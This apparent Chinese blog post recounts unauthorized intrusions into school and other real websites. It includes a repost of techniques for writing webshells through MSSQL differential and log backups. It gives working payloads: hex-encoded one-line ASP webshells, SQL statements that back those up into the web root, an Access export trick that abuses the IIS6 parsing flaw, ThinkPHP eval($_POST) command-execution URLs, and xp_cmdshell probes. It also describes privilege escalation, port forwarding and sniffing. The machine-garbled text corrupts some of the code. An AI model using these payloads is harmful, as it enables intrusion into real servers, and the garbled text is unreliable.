复习一下sql server的差异备份

MSSQL差距备份,正是和前三回备份作相比,把不平等的剧情备份下来,那样,只要前二遍备份后,插入新的从头到尾的经过,差别备份就足以把刚插入的内容备份出来,而以此备份文件将大大收缩,获得webShell的功成名就也提升了超级多!
差别备份的流程大致这样: 1.完完全全备份二遍(保存地点当然能够改卡塔尔国backupdatabase库名todisk=’c:\ddd.bak’;– 2.开立表并片尾曲入数据
createtable[dbo].[dtest]([cmd][image]State of Qatar;
insertintodtest(cmd卡塔尔(قطر‎values(0x3C25657865637574652872657175657374282261222929253E卡塔尔国;–
3.扩充差距备份
backupdatabase库名todisk=’目之处\d.asp’WITHDIFFERENTIAL,FORMAT;–
上面 0x3C25657865637574652872657175657374282261222929253E
便是一句话木马的从头到尾的经过:%execute(request(“a”State of Qatar卡塔尔%

来源:

如下是网络广泛的差异备份代码,思路同样!

行使差距备份进步进步backupwebshell的成功率,收缩文件大小 步骤:
declare@asysname,@snvarchar(4000卡塔尔(قطر‎select@a=db_name(),@s=0x77006F006B0061006F002E00620061006B00backupdatabase@atodisk=@s
createtable[dbo].[xiaolu]([cmd][image]);
insertintoxiaolu(cmd)values(0x3C25657865637574652872657175657374282261222929253E)
declare@asysname,@snvarchar(4000)select@a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000backupdatabase@atodisk=@sWITHDIFFERENTIAL,FORMAT
0x77006F006B0061006F002E00620061006B00为wokao.bak
0x3C25657865637574652872657175657374282261222929253E是%execute(request(“a”))%
0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000是e:\web\wokao.asp
评释:方法不是自个儿想的,笔者只是写工具,暗中同意得到shell是

经过不算波折,但还算长久,知识点比较零碎,切合新手学习。

%execute(request(“a”))%

自家发觉下面代码,有时会失效,而一直用
backupdatabase库名todisk=’c:\ddd.bak’
createtable[dbo].[dtest]([cmd][image]State of Qatar;
insertintodtest(cmd卡塔尔国values(0x3C25657865637574652872657175657374282261222929253E卡塔尔backupdatabase库名todisk=’目的地点\d.asp’WITHDIFFERENTIAL,FORMAT;–
却足以成功,所以把最原始的秘籍写出来!思路是先行者所创,那不说大家也清楚的!
库名必定要卓有成效的库名,日常注入工具都能够得到!假若某站过滤”‘”,将在把字符内容转为数值了!

那么,当时自个儿还小,大家一起来回想,那多少个年 我们年轻时 蛋疼的煎熬。

网络还应该有log增量备份的,作者也把她记下一下

另生机勃勃种log增量备份本事: ‘;alterdatabasenullsetRECOVE本田UR-VYFULL–
‘;createtablecmd(aimageState of Qatar– ‘;backuplognulltodisk=’f:\cmd’withinit–
‘;insertintocmd(a卡塔尔(قطر‎values(0x3C2565786563757465287265717565737428226122292
9253EDA卡塔尔(قطر‎– ‘;backuplognulltodisk=’备份路径’–
PS:0x3C2565786563757465287265717565737428226122292
9253EDA是一句话小马16进制转来的 谈到一句话马,还是能有诸如此比二种写法:
a卡塔尔国.%%25Execute(request(“a”卡塔尔卡塔尔国%%25 b卡塔尔.%Execute(request(“a”卡塔尔国卡塔尔(قطر‎%
c卡塔尔国.%%executerequest(“a”卡塔尔%%
d卡塔尔.scriptlanguage=VBScriptrunat=serverexecuterequest(“a”卡塔尔(قطر‎/script
eState of Qatar.%25Execute(request(“a”卡塔尔卡塔尔国%25

离开课校那时,很好的朋友摆了饭局送小编,席间作者和楷文(淡定哥)有个约定。。。

火急,转眼生机勃勃载,人事变化,颜值沧海桑田,楷文兄,没作者的生活你平安无事。母师长网笔者还未消除,你是或不是早就炸了他的墙角?

出于各样原因,向来尚未丰硕的时日。。。渗透进程乌七八糟

来看下情形:

学园主站:www.*****x.cn

*音讯征集

千帆竞发询问结果:

图片 1

图片 2

少数数据库的调用做了防注入管理:

图片 3

[AppleScript]纯文本查看复制代码

?

web服务:iis6.0ASP 支持aspx

数据库:access

网址后台:

手工找到数字型注入点:http://www.s*******.cn/news_detail.asp?id=954

让人惊叹标入库查询 sqlinjection

Sqlmap跑起来

图片 4

结果不太意得志满,爆破不出表和字段,看来管理员为了制止猜表做了表前缀

对此access的流入,猜不到表,渗透半涂而废

新兴又在复习的时候见到了sql注入access导出txt等公事情势,无法导出asp  然则大家能够合作IIS6.0解析漏洞导出binghe.asp;binghe.txt之类的文书

那便是说难点来了  , 路线何地找??
又不是phpmyadmin之类的能够报错文件,asp报错路线比非常少,可是笔者倏然想到了conn.asp和5c%暴库

5c%是未能如愿,conn.asp依旧得以的,直接访问数据库连接文件,数据库连接文件和多少调用的相对路线冲突引致报错,没有错爆出了相对路线:

图片 5

那么来sqlmap的–sql-shell用旧事中的sql实施access导出txt、xls试试
同盟iis6.0剖判漏洞(PS:access已经过时,没研讨过,小菜也不清楚access的sqlshell是或不是足以试行,曾在后台境遇过可以实行sql的职能,譬喻帝国的一点版本)

各类实施以下语句就可以导出一句话了

[AppleScript]纯文本查看复制代码

?

1

2

3

4create table cmd(a varchar(50))

insertintocmd(a卡塔尔(قطر‎values(‘一句话木马’卡塔尔(قطر‎

select*into[a]in’e:\web\webshellcc\1.asa;x.xls’ ‘excel4.0;’fromcmd

drop table cmd

更轻巧的

[AppleScript]纯文本查看复制代码

?

Select ‘asp一句话木马’into[vote]in’e:\web\webshellcc\1.asa;x.xls’
‘excel8.0;’ fromvote

Sqlshell试行无果
看来是自家想多了  恐怕access注入点平素就不能够得到实在的sqlshell

图片 6

转而看其网站后台,用burpsuite爆破没跑出来,, 退步

图片 7

小站,也看不出是何许cms,扫了目录,没有大的意识,有上传,不过要求报到,不能有效使用,有留言板,尝试XSS,无果,存在iis短文件名败露漏洞,利用无果

入侵脚步又废可是返

上次询问主站未有啥收获  C段之,

瞄到多个站 本市的**中学  如雷灌耳!

流入三个,,sqlmap之

[AppleScript]纯文本查看复制代码

?

–current-user   –sql-shell–os-shell

sa!!!!

图片 8

[AppleScript]纯文本查看复制代码

?

selectcount(*)frommaster.dbo.sysobjectswherextype=’x’
andname=’xp_cmdshell’

归来”1″,表达存在存款和储蓄过程xp_cmdshell

图片 9

试着实践cmd 不行啊老是逾期  怪事

图片 10

os-shell尝试得到人机联作式cmd  SQLmap自动提权修复xp_cmdshell也是过期  不亮堂何地出了难题

手动在注入点实践也充裕。。

咋做呢?动脑依然找目录写个shell

用啊D列个目录  列了一会通过相比较就找到了根目录

D:\wwwroot\dxzx\

图片 11

跑了数据
解了md5  进了后台  想差别备份  可是手抖弄了个插配置文件一句话  可是忘了闭合asp标识

图片 12

新兴网址挂了  差一些吓哭  俺实在不是故意的 。  不能够复现  等复苏了再说吧

图片 13

私家对此表示足够歉意,对不起,已经致道歉信与修复方案至管理员邮箱

后来想到本身是何其的蠢笨,为啥不log备份,增量备份导出shell呢???

让小编喝大器晚成杯82年的乐事冷静一下

事实上log备份导出Public权限都能导出,更并且我们是sa,假设蒙受奇葩的磁盘权限,能够品味图片上传目录

#导出方法有以下三种方法:

MSSQL差距备份,就是和前三回备份作相比较,把不相仿的内容备份下来,那样,只要前一回备份后,插入新的原委,差别备份就能够把刚插入的内容备份出来,而以此备份文件将大大裁减,获得webShell的功成名就也提升了过多!

出入备份的流程大约那样:

[AppleScript]纯文本查看复制代码

?

01

02

03

04

05

06

07

08

09

10

11

121.完好备份二遍(保存地方当然能够改卡塔尔

backup database 库名todisk=’c:\ddd.bak’;–

2.创建表并片尾曲入数据

create table [dbo].[dtest]([cmd] [image]);

insertintodtest(cmd)values(0x3C25657865637574652872657175657374282261222929253E);–

3.开展差距备份

backup database 库名todisk=’指标地点\d.asp’ WITH DIFFERENTIAL,FORMAT;–

上面

[AppleScript]纯文本查看复制代码

?

0x3C25657865637574652872657175657374282261222929253E

便是一句话木马的源委:

[AppleScript]纯文本查看复制代码

?

<%execute(request(“a”))%>

如下是整理的宽广的间隔备份代码,思路相像!

===================================================

运用差距备份升高增加backupwebshell的成功率,减弱文件大小

步骤:

[AppleScript]纯文本查看复制代码

?

1

2

3

4declare @a sysname,@s
nvarchar(4000)select@a=db_name(),@s=0x77006F006B0061006F002E00620061006B00backup
database @a todisk=@s

create table [dbo].[xiaolu]([cmd] [image]);

insertintoxiaolu(cmd)values(0x3C25657865637574652872657175657374282261222929253E)

declare @a sysname,@s
nvarchar(4000)select@a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000backup
database @atodisk=@s WITH DIFFERENTIAL,FORMAT

0x77006F006B0061006F002E00620061006B00为wokao.bak

0x3C25657865637574652872657175657374282261222929253E是<%execute(request(“a”))%>

0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000是e:\web\wokao.asp

扬言:方法不是本人想的,小编只是写工具,暗中同意得到shell是

[AppleScript]纯文本查看复制代码

?

<%execute(request(“a”))%>

===============================================================

本人开采上面代码,不经常会不得要领,而直白用

[AppleScript]纯文本查看复制代码

?

1

backup database 库名todisk=’c:\ddd.bak’ create table
[dbo].[dtest]([cmd] [image]卡塔尔;
insertintodtest(cmd卡塔尔国values(0x3C25657865637574652872657175657374282261222929253E卡塔尔(قطر‎backup
database 库名todisk=’指标地点\d.asp’WITH DIFFERENTIAL,FORMAT;–

却得以成功,所以把最原始的艺术写出来!思路是前人所创,这不说大家也知晓的!库名
必必要得力的库名,通常注入工具都足以获得!如若某站过滤
“‘”,就要把字符内容转为数值了!

网络还会有log增量备份的,笔者也把她记下一下

=====================================================

另生机勃勃种log增量备份本领:

例:在注入点用;联合推行

[AppleScript]纯文本查看复制代码

?

1

2

3

4

5

6′;alter database nullsetRECOVERY FULL–

‘;create table cmd(aimage)–

‘;backuplognulltodisk=’f:\cmd’withinit–

‘;insertintocmd(a)values(0x3C2565786563757465287265717565737428226122292

9253EDA)–

‘;backuplognulltodisk=’备份路线’–

PS:0x3C25657865637574652872657175657374282261222929253EDA
是一句话小马16进制转来的

是为了防守单引号和asp标识的密封难点,上边是三种能够品尝的写法:

[AppleScript]纯文本查看复制代码

?

1

2

3

4

5a).<%%25Execute(request(“a”))%%25>

b).<%Execute(request(“a”))%>

c).%><%execute request(“a”)%><%

d).executerequest(“a”)

e).<%25Execute(request(“a”))%25>

权限够大还足以直接调用systemobject的函数直接写:限于篇幅,大家能够自动整理

依旧没砍下  不过本身的步子不会告意气风发段落

C段生龙活虎圈,异常快占有个虚弱的网址,账户名和密码都以网址简单称谓、轻巧的提权了

权限还足以

图片 14

内网 lcx转发过来

图片 15

唯独,c段的内网,意义相当的小,甩掉。

转了一会,又一个c段的,直接注入写shell,也是直接溢出提权

图片 16

又是内网。。运气不是很好哎。

卡的令人想死  估量是个喳喳服务器,不看她了。。。

图片 17

拿的c段皆以内网,不可能arp威胁指标,嗅探不到。。。。

思路转一下,来看旁注!拿目的的内网

攻克三个与主站同外网ip的站点 有梦想撕入内网。。。

套路是流入进后台 截断拿shell

图片 18

来提权服务器  又是恶心的内网 老套路转载上去

倒车好 登陆 见到那样子

图片 19

不管他,mstsc/admin,挤下去,,

图片 20

看了下,主站不在服务器上,运气好背啊,小小内网渗透一下

图片 21

密码是私行设定的,其实特不是密码,表达存在ipc$空连接的尾巴,好古老啊,手工利用一向下探底视,退步了,作者都没心绪多少个三个测量检验了

图片 22

读取一下拘禁密码,扫一下?

图片 23

没读出来管理员的。。为何运气这么差  导出hash去破解作者也无意搞了

嗅探初叶,不久就有结果了哈哈

图片 24

可是都是有的不行的音信,以往此地嗅探着,过个十天半个月的再来看看

内网存活:

图片 25

那么难点来了,我们可不得以在内网里面netfake?

目的站的内网ip大家是通过在网址主页点多个校内应用获悉的

事实注明不行,,,先放在那嗅探吧  。。。。。

图片 26

事实上还恐怕有ip冲突威胁,可是强迫就没看头啊  作者要么要获得权力

再来看看此外三个旁站

后一次看吧     背着书包上学园。。。。。。。。。。。。

额 放假了

再来看看洛阳市********育中心

时局相比好,Thinkphp框架,命令实践直接抢占

具体方法:

[AppleScript]纯文本查看复制代码

?

1

2

3index.php/module/aciton/param1/${@phpinfo()}

index.php/module/action/param1/{${eval($_POST[s])}}

**来了来了提权**

**翻到了root直接来udf但是用t00ls的shell提权显示成立lib/plugin目录退步**

图片 27

直白在菜刀里面右键创造目录**成功**

图片 28

图片 29

上用户

图片 30

实则这里的udf 为了卫戍各类错误  作者写过贰个小工具 传上去运营,将 自动udf
mof 和 lpk 二种形式提权,详细的情况见

[AppleScript]纯文本查看复制代码

?

lcx 连接上去拜见

图片 31

图片 32

翻下目录  未有指标站音信等

码字很累,实现篇超级快会写出来,更不错哦

未完待续。。。

发表评论

电子邮件地址不会被公开。 必填项已用*标注